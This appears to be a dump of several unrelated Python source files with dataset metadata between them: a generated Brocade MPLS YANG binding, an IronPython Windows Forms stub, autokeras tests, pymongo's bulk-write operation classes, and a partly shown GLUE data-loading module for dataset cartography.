self.__backup = YANGDynClass(base=backup.backup, is_container='container', presence=False, yang_name="backup", rest_name="backup", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-backup', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
def _get_instances(self):
return self.__instances
def _set_instances(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType("instance_id lsp_id",instances.instances, yang_name="instances", rest_name="instances", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='instance-id lsp-id', extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-instance', u'cli-suppress-show-path': None}}), is_container='list', yang_name="instances", rest_name="instances", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-instance', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """instances must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType("instance_id lsp_id",instances.instances, yang_name="instances", rest_name="instances", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='instance-id lsp-id', extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-instance', u'cli-suppress-show-path': None}}), is_container='list', yang_name="instances", rest_name="instances", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-instance', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)""",
})
self.__instances = t
if hasattr(self, '_set'):
self._set()
def _unset_instances(self):
self.__instances = YANGDynClass(base=YANGListType("instance_id lsp_id",instances.instances, yang_name="instances", rest_name="instances", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='instance-id lsp-id', extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-instance', u'cli-suppress-show-path': None}}), is_container='list', yang_name="instances", rest_name="instances", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-instance', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
def _get_secondary_path(self):
return self.__secondary_path
def _set_secondary_path(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType("path_name",secondary_path.secondary_path, yang_name="secondary-path", rest_name="secondary-path", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='path-name', extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-sec-path', u'cli-suppress-show-path': None}}), is_container='list', yang_name="secondary-path", rest_name="secondary-path", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-sec-path', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """secondary_path must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType("path_name",secondary_path.secondary_path, yang_name="secondary-path", rest_name="secondary-path", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='path-name', extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-sec-path', u'cli-suppress-show-path': None}}), is_container='list', yang_name="secondary-path", rest_name="secondary-path", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-sec-path', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)""",
})
self.__secondary_path = t
if hasattr(self, '_set'):
self._set()
def _unset_secondary_path(self):
self.__secondary_path = YANGDynClass(base=YANGListType("path_name",secondary_path.secondary_path, yang_name="secondary-path", rest_name="secondary-path", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='path-name', extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-sec-path', u'cli-suppress-show-path': None}}), is_container='list', yang_name="secondary-path", rest_name="secondary-path", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-lsp-sec-path', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
lsp_name = __builtin__.property(_get_lsp_name)
lsp_type = __builtin__.property(_get_lsp_type)
bypass_lsp_type = __builtin__.property(_get_bypass_lsp_type)
interface = __builtin__.property(_get_interface)
history = __builtin__.property(_get_history)
basic = __builtin__.property(_get_basic)
forwarding = __builtin__.property(_get_forwarding)
frr = __builtin__.property(_get_frr)
backup = __builtin__.property(_get_backup)
instances = __builtin__.property(_get_instances)
secondary_path = __builtin__.property(_get_secondary_path)
_pyangbind_elements = {'lsp_name': lsp_name, 'lsp_type': lsp_type, 'bypass_lsp_type': bypass_lsp_type, 'interface': interface, 'history': history, 'basic': basic, 'forwarding': forwarding, 'frr': frr, 'backup': backup, 'instances': instances, 'secondary_path': secondary_path, }
| true | true |
f72ef7eb0ddb67009fc21687759d869de7d0b79e | 456 | py | Python | stubs.min/System/Windows/Forms/__init___parts/HScrollProperties.py | ricardyn/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | 1 | 2021-02-02T13:39:16.000Z | 2021-02-02T13:39:16.000Z | stubs.min/System/Windows/Forms/__init___parts/HScrollProperties.py | hdm-dt-fb/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | null | null | null | stubs.min/System/Windows/Forms/__init___parts/HScrollProperties.py | hdm-dt-fb/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | null | null | null | class HScrollProperties(ScrollProperties):
"""
Provides basic properties for the System.Windows.Forms.HScrollBar
HScrollProperties(container: ScrollableControl)
"""
@staticmethod
def __new__(self,container):
""" __new__(cls: type,container: ScrollableControl) """
pass
ParentControl=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the control to which this scroll information applies.
"""
| 26.823529 | 85 | 0.72807 | class HScrollProperties(ScrollProperties):
""" __new__(cls: type,container: ScrollableControl) """
pass
"""Gets the control to which this scroll information applies.
| true | true |
f72ef7f4af6964877bdcb43c3b93166aefe758c0 | 1,273 | py | Python | tests/test_bayesian.py | eric-erki/autokeras | d365a04af7f41641c4b0634fc076f6dbe2364d53 | [
"MIT"
] | 1 | 2018-08-06T03:57:51.000Z | 2018-08-06T03:57:51.000Z | tests/test_bayesian.py | eric-erki/autokeras | d365a04af7f41641c4b0634fc076f6dbe2364d53 | [
"MIT"
] | null | null | null | tests/test_bayesian.py | eric-erki/autokeras | d365a04af7f41641c4b0634fc076f6dbe2364d53 | [
"MIT"
] | 1 | 2018-10-11T03:43:41.000Z | 2018-10-11T03:43:41.000Z | from autokeras.bayesian import *
from tests.common import get_add_skip_model, get_concat_skip_model, get_conv_dense_model
def test_edit_distance():
descriptor1 = get_add_skip_model().extract_descriptor()
descriptor2 = get_concat_skip_model().extract_descriptor()
assert edit_distance(descriptor1, descriptor2, 1.0) == 2.0
def test_edit_distance2():
descriptor1 = get_conv_dense_model().extract_descriptor()
graph = get_conv_dense_model()
graph.to_conv_deeper_model(1, 3)
graph.to_wider_model(5, 6)
graph.to_wider_model(17, 3)
descriptor2 = graph.extract_descriptor()
assert edit_distance(descriptor1, descriptor2, 1.0) == 1.5
def test_bourgain_embedding():
assert bourgain_embedding_matrix([[0]]).shape == (1, 1)
assert bourgain_embedding_matrix([[1, 0], [0, 1]]).shape == (2, 2)
def test_gpr():
gpr = IncrementalGaussianProcess(1.0)
gpr.first_fit([get_add_skip_model().extract_descriptor()], [0.5])
assert gpr.first_fitted
gpr.incremental_fit([get_concat_skip_model().extract_descriptor()], [0.6])
assert abs(gpr.predict(np.array([get_add_skip_model().extract_descriptor()]))[0] - 0.5) < 1e-4
assert abs(gpr.predict(np.array([get_concat_skip_model().extract_descriptor()]))[0] - 0.6) < 1e-4
| 37.441176 | 101 | 0.732914 | from autokeras.bayesian import *
from tests.common import get_add_skip_model, get_concat_skip_model, get_conv_dense_model
def test_edit_distance():
descriptor1 = get_add_skip_model().extract_descriptor()
descriptor2 = get_concat_skip_model().extract_descriptor()
assert edit_distance(descriptor1, descriptor2, 1.0) == 2.0
def test_edit_distance2():
descriptor1 = get_conv_dense_model().extract_descriptor()
graph = get_conv_dense_model()
graph.to_conv_deeper_model(1, 3)
graph.to_wider_model(5, 6)
graph.to_wider_model(17, 3)
descriptor2 = graph.extract_descriptor()
assert edit_distance(descriptor1, descriptor2, 1.0) == 1.5
def test_bourgain_embedding():
assert bourgain_embedding_matrix([[0]]).shape == (1, 1)
assert bourgain_embedding_matrix([[1, 0], [0, 1]]).shape == (2, 2)
def test_gpr():
gpr = IncrementalGaussianProcess(1.0)
gpr.first_fit([get_add_skip_model().extract_descriptor()], [0.5])
assert gpr.first_fitted
gpr.incremental_fit([get_concat_skip_model().extract_descriptor()], [0.6])
assert abs(gpr.predict(np.array([get_add_skip_model().extract_descriptor()]))[0] - 0.5) < 1e-4
assert abs(gpr.predict(np.array([get_concat_skip_model().extract_descriptor()]))[0] - 0.6) < 1e-4
| true | true |
f72ef82aa0bb7f97b0195399046eb262d8c67ee3 | 17,244 | py | Python | pymongo/operations.py | james00209/mongodb-mongo-python-driver | bf6af9fd77bc13c0668018500071992e9e5ba05b | [
"Apache-2.0"
] | 1 | 2020-08-04T08:30:25.000Z | 2020-08-04T08:30:25.000Z | pymongo/operations.py | james00209/mongodb-mongo-python-driver | bf6af9fd77bc13c0668018500071992e9e5ba05b | [
"Apache-2.0"
] | null | null | null | pymongo/operations.py | james00209/mongodb-mongo-python-driver | bf6af9fd77bc13c0668018500071992e9e5ba05b | [
"Apache-2.0"
] | null | null | null | # Copyright 2015-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Operation class definitions."""
from bson.py3compat import string_type
from pymongo import helpers
from pymongo.common import validate_boolean, validate_is_mapping, validate_list
from pymongo.collation import validate_collation_or_none
from pymongo.helpers import _gen_index_name, _index_document, _index_list
class InsertOne(object):
"""Represents an insert_one operation."""
__slots__ = ("_doc",)
def __init__(self, document):
"""Create an InsertOne instance.
For use with :meth:`~pymongo.collection.Collection.bulk_write`.
:Parameters:
- `document`: The document to insert. If the document is missing an
_id field one will be added.
"""
self._doc = document
def _add_to_bulk(self, bulkobj):
"""Add this operation to the _Bulk instance `bulkobj`."""
bulkobj.add_insert(self._doc)
def __repr__(self):
return "InsertOne(%r)" % (self._doc,)
def __eq__(self, other):
if type(other) == type(self):
return other._doc == self._doc
return NotImplemented
def __ne__(self, other):
return not self == other
class DeleteOne(object):
"""Represents a delete_one operation."""
__slots__ = ("_filter", "_collation", "_hint")
def __init__(self, filter, collation=None, hint=None):
"""Create a DeleteOne instance.
For use with :meth:`~pymongo.collection.Collection.bulk_write`.
:Parameters:
- `filter`: A query that matches the document to delete.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only
supported on MongoDB 3.4 and above.
- `hint` (optional): An index to use to support the query
predicate specified either by its string name, or in the same
format as passed to
:meth:`~pymongo.collection.Collection.create_index` (e.g.
``[('field', ASCENDING)]``). This option is only supported on
MongoDB 4.4 and above.
.. versionchanged:: 3.11
Added the ``hint`` option.
.. versionchanged:: 3.5
Added the `collation` option.
"""
if filter is not None:
validate_is_mapping("filter", filter)
if hint is not None:
if not isinstance(hint, string_type):
hint = helpers._index_document(hint)
self._filter = filter
self._collation = collation
self._hint = hint
def _add_to_bulk(self, bulkobj):
"""Add this operation to the _Bulk instance `bulkobj`."""
bulkobj.add_delete(self._filter, 1, collation=self._collation,
hint=self._hint)
def __repr__(self):
return "DeleteOne(%r, %r)" % (self._filter, self._collation)
def __eq__(self, other):
if type(other) == type(self):
return ((other._filter, other._collation) ==
(self._filter, self._collation))
return NotImplemented
def __ne__(self, other):
return not self == other
class DeleteMany(object):
"""Represents a delete_many operation."""
__slots__ = ("_filter", "_collation", "_hint")
def __init__(self, filter, collation=None, hint=None):
"""Create a DeleteMany instance.
For use with :meth:`~pymongo.collection.Collection.bulk_write`.
:Parameters:
- `filter`: A query that matches the documents to delete.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only
supported on MongoDB 3.4 and above.
- `hint` (optional): An index to use to support the query
predicate specified either by its string name, or in the same
format as passed to
:meth:`~pymongo.collection.Collection.create_index` (e.g.
``[('field', ASCENDING)]``). This option is only supported on
MongoDB 4.4 and above.
.. versionchanged:: 3.11
Added the ``hint`` option.
.. versionchanged:: 3.5
Added the `collation` option.
"""
if filter is not None:
validate_is_mapping("filter", filter)
if hint is not None:
if not isinstance(hint, string_type):
hint = helpers._index_document(hint)
self._filter = filter
self._collation = collation
self._hint = hint
def _add_to_bulk(self, bulkobj):
"""Add this operation to the _Bulk instance `bulkobj`."""
bulkobj.add_delete(self._filter, 0, collation=self._collation,
hint=self._hint)
def __repr__(self):
return "DeleteMany(%r, %r)" % (self._filter, self._collation)
def __eq__(self, other):
if type(other) == type(self):
return ((other._filter, other._collation) ==
(self._filter, self._collation))
return NotImplemented
def __ne__(self, other):
return not self == other
class ReplaceOne(object):
"""Represents a replace_one operation."""
__slots__ = ("_filter", "_doc", "_upsert", "_collation", "_hint")
def __init__(self, filter, replacement, upsert=False, collation=None,
hint=None):
"""Create a ReplaceOne instance.
For use with :meth:`~pymongo.collection.Collection.bulk_write`.
:Parameters:
- `filter`: A query that matches the document to replace.
- `replacement`: The new document.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only
supported on MongoDB 3.4 and above.
- `hint` (optional): An index to use to support the query
predicate specified either by its string name, or in the same
format as passed to
:meth:`~pymongo.collection.Collection.create_index` (e.g.
``[('field', ASCENDING)]``). This option is only supported on
MongoDB 4.2 and above.
.. versionchanged:: 3.11
Added the ``hint`` option.
.. versionchanged:: 3.5
Added the ``collation`` option.
"""
if filter is not None:
validate_is_mapping("filter", filter)
if upsert is not None:
validate_boolean("upsert", upsert)
if hint is not None:
if not isinstance(hint, string_type):
hint = helpers._index_document(hint)
self._filter = filter
self._doc = replacement
self._upsert = upsert
self._collation = collation
self._hint = hint
def _add_to_bulk(self, bulkobj):
"""Add this operation to the _Bulk instance `bulkobj`."""
bulkobj.add_replace(self._filter, self._doc, self._upsert,
collation=self._collation, hint=self._hint)
def __eq__(self, other):
if type(other) == type(self):
return (
(other._filter, other._doc, other._upsert, other._collation,
other._hint) == (self._filter, self._doc, self._upsert,
self._collation, other._hint))
return NotImplemented
def __ne__(self, other):
return not self == other
def __repr__(self):
return "%s(%r, %r, %r, %r, %r)" % (
self.__class__.__name__, self._filter, self._doc, self._upsert,
self._collation, self._hint)
class _UpdateOp(object):
"""Private base class for update operations."""
__slots__ = ("_filter", "_doc", "_upsert", "_collation", "_array_filters",
"_hint")
def __init__(self, filter, doc, upsert, collation, array_filters, hint):
if filter is not None:
validate_is_mapping("filter", filter)
if upsert is not None:
validate_boolean("upsert", upsert)
if array_filters is not None:
validate_list("array_filters", array_filters)
if hint is not None:
if not isinstance(hint, string_type):
hint = helpers._index_document(hint)
self._filter = filter
self._doc = doc
self._upsert = upsert
self._collation = collation
self._array_filters = array_filters
self._hint = hint
def __eq__(self, other):
if type(other) == type(self):
return (
(other._filter, other._doc, other._upsert, other._collation,
other._array_filters, other._hint) ==
(self._filter, self._doc, self._upsert, self._collation,
self._array_filters, self._hint))
return NotImplemented
def __ne__(self, other):
return not self == other
def __repr__(self):
return "%s(%r, %r, %r, %r, %r, %r)" % (
self.__class__.__name__, self._filter, self._doc, self._upsert,
self._collation, self._array_filters, self._hint)
class UpdateOne(_UpdateOp):
"""Represents an update_one operation."""
__slots__ = ()
def __init__(self, filter, update, upsert=False, collation=None,
array_filters=None, hint=None):
"""Represents an update_one operation.
For use with :meth:`~pymongo.collection.Collection.bulk_write`.
:Parameters:
- `filter`: A query that matches the document to update.
- `update`: The modifications to apply.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only
supported on MongoDB 3.4 and above.
- `array_filters` (optional): A list of filters specifying which
array elements an update should apply. Requires MongoDB 3.6+.
- `hint` (optional): An index to use to support the query
predicate specified either by its string name, or in the same
format as passed to
:meth:`~pymongo.collection.Collection.create_index` (e.g.
``[('field', ASCENDING)]``). This option is only supported on
MongoDB 4.2 and above.
.. versionchanged:: 3.11
Added the `hint` option.
.. versionchanged:: 3.9
Added the ability to accept a pipeline as the `update`.
.. versionchanged:: 3.6
Added the `array_filters` option.
.. versionchanged:: 3.5
Added the `collation` option.
"""
super(UpdateOne, self).__init__(filter, update, upsert, collation,
array_filters, hint)
def _add_to_bulk(self, bulkobj):
"""Add this operation to the _Bulk instance `bulkobj`."""
bulkobj.add_update(self._filter, self._doc, False, self._upsert,
collation=self._collation,
array_filters=self._array_filters,
hint=self._hint)
class UpdateMany(_UpdateOp):
"""Represents an update_many operation."""
__slots__ = ()
def __init__(self, filter, update, upsert=False, collation=None,
array_filters=None, hint=None):
"""Create an UpdateMany instance.
For use with :meth:`~pymongo.collection.Collection.bulk_write`.
:Parameters:
- `filter`: A query that matches the documents to update.
- `update`: The modifications to apply.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only
supported on MongoDB 3.4 and above.
- `array_filters` (optional): A list of filters specifying which
array elements an update should apply. Requires MongoDB 3.6+.
- `hint` (optional): An index to use to support the query
predicate specified either by its string name, or in the same
format as passed to
:meth:`~pymongo.collection.Collection.create_index` (e.g.
``[('field', ASCENDING)]``). This option is only supported on
MongoDB 4.2 and above.
.. versionchanged:: 3.11
Added the `hint` option.
.. versionchanged:: 3.9
Added the ability to accept a pipeline as the `update`.
.. versionchanged:: 3.6
Added the `array_filters` option.
.. versionchanged:: 3.5
Added the `collation` option.
"""
super(UpdateMany, self).__init__(filter, update, upsert, collation,
array_filters, hint)
def _add_to_bulk(self, bulkobj):
"""Add this operation to the _Bulk instance `bulkobj`."""
bulkobj.add_update(self._filter, self._doc, True, self._upsert,
collation=self._collation,
array_filters=self._array_filters,
hint=self._hint)
class IndexModel(object):
"""Represents an index to create."""
__slots__ = ("__document",)
def __init__(self, keys, **kwargs):
"""Create an Index instance.
For use with :meth:`~pymongo.collection.Collection.create_indexes`.
Takes either a single key or a list of (key, direction) pairs.
The key(s) must be an instance of :class:`basestring`
(:class:`str` in python 3), and the direction(s) must be one of
(:data:`~pymongo.ASCENDING`, :data:`~pymongo.DESCENDING`,
:data:`~pymongo.GEO2D`, :data:`~pymongo.GEOHAYSTACK`,
:data:`~pymongo.GEOSPHERE`, :data:`~pymongo.HASHED`,
:data:`~pymongo.TEXT`).
Valid options include, but are not limited to:
- `name`: custom name to use for this index - if none is
given, a name will be generated.
- `unique`: if ``True`` creates a uniqueness constraint on the index.
- `background`: if ``True`` this index should be created in the
background.
- `sparse`: if ``True``, omit from the index any documents that lack
the indexed field.
- `bucketSize`: for use with geoHaystack indexes.
Number of documents to group together within a certain proximity
to a given longitude and latitude.
- `min`: minimum value for keys in a :data:`~pymongo.GEO2D`
index.
- `max`: maximum value for keys in a :data:`~pymongo.GEO2D`
index.
- `expireAfterSeconds`: <int> Used to create an expiring (TTL)
collection. MongoDB will automatically delete documents from
this collection after <int> seconds. The indexed field must
be a UTC datetime or the data will not expire.
- `partialFilterExpression`: A document that specifies a filter for
a partial index. Requires server version >= 3.2.
- `collation`: An instance of :class:`~pymongo.collation.Collation`
that specifies the collation to use in MongoDB >= 3.4.
- `wildcardProjection`: Allows users to include or exclude specific
field paths from a `wildcard index`_ using the { "$**" : 1} key
pattern. Requires server version >= 4.2.
See the MongoDB documentation for a full list of supported options by
server version.
:Parameters:
- `keys`: a single key or a list of (key, direction)
pairs specifying the index to create
- `**kwargs` (optional): any additional index creation
options (see the above list) should be passed as keyword
arguments
.. versionchanged:: 3.2
Added partialFilterExpression to support partial indexes.
.. _wildcard index: https://docs.mongodb.com/master/core/index-wildcard/#wildcard-index-core
"""
keys = _index_list(keys)
if "name" not in kwargs:
kwargs["name"] = _gen_index_name(keys)
kwargs["key"] = _index_document(keys)
collation = validate_collation_or_none(kwargs.pop('collation', None))
self.__document = kwargs
if collation is not None:
self.__document['collation'] = collation
@property
def document(self):
"""An index document suitable for passing to the createIndexes
command.
"""
return self.__document
| 38.577181 | 100 | 0.603978 |
from bson.py3compat import string_type
from pymongo import helpers
from pymongo.common import validate_boolean, validate_is_mapping, validate_list
from pymongo.collation import validate_collation_or_none
from pymongo.helpers import _gen_index_name, _index_document, _index_list
class InsertOne(object):
__slots__ = ("_doc",)
def __init__(self, document):
self._doc = document
def _add_to_bulk(self, bulkobj):
bulkobj.add_insert(self._doc)
def __repr__(self):
return "InsertOne(%r)" % (self._doc,)
def __eq__(self, other):
if type(other) == type(self):
return other._doc == self._doc
return NotImplemented
def __ne__(self, other):
return not self == other
class DeleteOne(object):
__slots__ = ("_filter", "_collation", "_hint")
def __init__(self, filter, collation=None, hint=None):
if filter is not None:
validate_is_mapping("filter", filter)
if hint is not None:
if not isinstance(hint, string_type):
hint = helpers._index_document(hint)
self._filter = filter
self._collation = collation
self._hint = hint
def _add_to_bulk(self, bulkobj):
bulkobj.add_delete(self._filter, 1, collation=self._collation,
hint=self._hint)
def __repr__(self):
return "DeleteOne(%r, %r)" % (self._filter, self._collation)
def __eq__(self, other):
if type(other) == type(self):
return ((other._filter, other._collation) ==
(self._filter, self._collation))
return NotImplemented
def __ne__(self, other):
return not self == other
class DeleteMany(object):
__slots__ = ("_filter", "_collation", "_hint")
def __init__(self, filter, collation=None, hint=None):
if filter is not None:
validate_is_mapping("filter", filter)
if hint is not None:
if not isinstance(hint, string_type):
hint = helpers._index_document(hint)
self._filter = filter
self._collation = collation
self._hint = hint
def _add_to_bulk(self, bulkobj):
bulkobj.add_delete(self._filter, 0, collation=self._collation,
hint=self._hint)
def __repr__(self):
return "DeleteMany(%r, %r)" % (self._filter, self._collation)
def __eq__(self, other):
if type(other) == type(self):
return ((other._filter, other._collation) ==
(self._filter, self._collation))
return NotImplemented
def __ne__(self, other):
return not self == other
class ReplaceOne(object):
__slots__ = ("_filter", "_doc", "_upsert", "_collation", "_hint")
def __init__(self, filter, replacement, upsert=False, collation=None,
hint=None):
if filter is not None:
validate_is_mapping("filter", filter)
if upsert is not None:
validate_boolean("upsert", upsert)
if hint is not None:
if not isinstance(hint, string_type):
hint = helpers._index_document(hint)
self._filter = filter
self._doc = replacement
self._upsert = upsert
self._collation = collation
self._hint = hint
def _add_to_bulk(self, bulkobj):
bulkobj.add_replace(self._filter, self._doc, self._upsert,
collation=self._collation, hint=self._hint)
def __eq__(self, other):
if type(other) == type(self):
return (
(other._filter, other._doc, other._upsert, other._collation,
other._hint) == (self._filter, self._doc, self._upsert,
self._collation, other._hint))
return NotImplemented
def __ne__(self, other):
return not self == other
def __repr__(self):
return "%s(%r, %r, %r, %r, %r)" % (
self.__class__.__name__, self._filter, self._doc, self._upsert,
self._collation, self._hint)
class _UpdateOp(object):
__slots__ = ("_filter", "_doc", "_upsert", "_collation", "_array_filters",
"_hint")
def __init__(self, filter, doc, upsert, collation, array_filters, hint):
if filter is not None:
validate_is_mapping("filter", filter)
if upsert is not None:
validate_boolean("upsert", upsert)
if array_filters is not None:
validate_list("array_filters", array_filters)
if hint is not None:
if not isinstance(hint, string_type):
hint = helpers._index_document(hint)
self._filter = filter
self._doc = doc
self._upsert = upsert
self._collation = collation
self._array_filters = array_filters
self._hint = hint
def __eq__(self, other):
if type(other) == type(self):
return (
(other._filter, other._doc, other._upsert, other._collation,
other._array_filters, other._hint) ==
(self._filter, self._doc, self._upsert, self._collation,
self._array_filters, self._hint))
return NotImplemented
def __ne__(self, other):
return not self == other
def __repr__(self):
return "%s(%r, %r, %r, %r, %r, %r)" % (
self.__class__.__name__, self._filter, self._doc, self._upsert,
self._collation, self._array_filters, self._hint)
class UpdateOne(_UpdateOp):
__slots__ = ()
def __init__(self, filter, update, upsert=False, collation=None,
array_filters=None, hint=None):
super(UpdateOne, self).__init__(filter, update, upsert, collation,
array_filters, hint)
def _add_to_bulk(self, bulkobj):
bulkobj.add_update(self._filter, self._doc, False, self._upsert,
collation=self._collation,
array_filters=self._array_filters,
hint=self._hint)
class UpdateMany(_UpdateOp):
__slots__ = ()
def __init__(self, filter, update, upsert=False, collation=None,
array_filters=None, hint=None):
super(UpdateMany, self).__init__(filter, update, upsert, collation,
array_filters, hint)
def _add_to_bulk(self, bulkobj):
bulkobj.add_update(self._filter, self._doc, True, self._upsert,
collation=self._collation,
array_filters=self._array_filters,
hint=self._hint)
class IndexModel(object):
__slots__ = ("__document",)
def __init__(self, keys, **kwargs):
keys = _index_list(keys)
if "name" not in kwargs:
kwargs["name"] = _gen_index_name(keys)
kwargs["key"] = _index_document(keys)
collation = validate_collation_or_none(kwargs.pop('collation', None))
self.__document = kwargs
if collation is not None:
self.__document['collation'] = collation
@property
def document(self):
return self.__document
| true | true |
f72ef8d492f94e15b347ad4d22bde114fd4df114 | 9,789 | py | Python | cartography/classification/glue_utils.py | dyahadila/ood_cartography | ff65bf2b1a170e2913f0019a15af3398a1808f0f | [
"Apache-2.0"
] | null | null | null | cartography/classification/glue_utils.py | dyahadila/ood_cartography | ff65bf2b1a170e2913f0019a15af3398a1808f0f | [
"Apache-2.0"
] | null | null | null | cartography/classification/glue_utils.py | dyahadila/ood_cartography | ff65bf2b1a170e2913f0019a15af3398a1808f0f | [
"Apache-2.0"
] | null | null | null | import logging
import os
from transformers import glue_compute_metrics
from transformers import glue_convert_examples_to_features as convert_examples_to_features
from transformers import glue_output_modes
from transformers import glue_processors
from transformers.data.processors.glue import MnliMismatchedProcessor
from transformers.data.processors.utils import InputFeatures
from transformers.file_utils import is_tf_available
if is_tf_available():
import tensorflow as tf
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s", level=logging.INFO
)
logger = logging.getLogger(__name__)
from cartography.data_utils_glue import convert_string_to_unique_number
from cartography.classification.mnli_utils import AdaptedMnliMismatchedProcessor, AdaptedMnliProcessor
from cartography.classification.qnli_utils import AdaptedQnliProcessor
from cartography.classification.snli_utils import SNLIProcessor
from cartography.classification.winogrande_utils import WinograndeProcessor
from cartography.classification.wnli_utils import AdaptedWnliProcessor
from cartography.classification.rte_utils import AdaptedRteProcessor
import pandas as pd
glue_processors["snli"] = SNLIProcessor
glue_processors["mnli"] = AdaptedMnliProcessor
glue_processors["mnli-mm"] = AdaptedMnliMismatchedProcessor
glue_processors["qnli"] = AdaptedQnliProcessor
glue_processors["winogrande"] = WinograndeProcessor
glue_processors["wnli"] = AdaptedWnliProcessor
glue_processors["rte"] = AdaptedRteProcessor
glue_output_modes["snli"] = "classification"
glue_output_modes["winogrande"] = "classification"
class AdaptedInputFeatures(InputFeatures):
def __init__(self, input_ids, attention_mask=None, token_type_ids=None, label=None, example_id=None, lex = None,
const=None, subs=None, original_idx=None):
self.input_ids = input_ids
self.attention_mask = attention_mask
self.token_type_ids = token_type_ids
self.label = label
self.example_id = example_id
self.lex = lex
self.const = const
self.subs = subs
self.original_idx = original_idx
def get_instance_heuristics(task, data_split):
mode = data_split
### UNCOMMENT FOR MNLI
if 'dev' in data_split:
mode = 'dev'
if task.upper() == 'MNLI':
mode = 'dev_matched'
df = pd.read_csv("/home/jusun/adila001/{}/{}_heuristic.tsv".format(task.upper(), mode), delimiter="\t|\n")
lexical = df["lexical"].tolist()
if 'constituent' in set(df.columns):
constituent = df["constituent"].tolist()
else:
constituent = [0 for i in range(df.shape[0])]
subsequence = df["subsequence"].tolist()
return lexical, constituent, subsequence
def adapted_glue_convert_examples_to_features(
examples,
tokenizer,
max_length=512,
task=None,
label_list=None,
output_mode=None,
pad_on_left=False,
pad_token=0,
pad_token_segment_id=0,
mask_padding_with_zero=True,
heuristics=True,
data_split='train',
):
"""
Adapted from `transformers`. New functionality: also return an integer ID for each example.
Loads a data file into a list of ``InputFeatures``
Args:
examples: List of ``InputExamples`` or ``tf.data.Dataset`` containing the examples.
tokenizer: Instance of a tokenizer that will tokenize the examples
max_length: Maximum example length
task: GLUE task
label_list: List of labels. Can be obtained from the processor using the ``processor.get_labels()`` method
output_mode: String indicating the output mode. Either ``regression`` or ``classification``
pad_on_left: If set to ``True``, the examples will be padded on the left rather than on the right (default)
pad_token: Padding token
pad_token_segment_id: The segment ID for the padding token (It is usually 0, but can vary such as for XLNet where it is 4)
mask_padding_with_zero: If set to ``True``, the attention mask will be filled by ``1`` for actual values
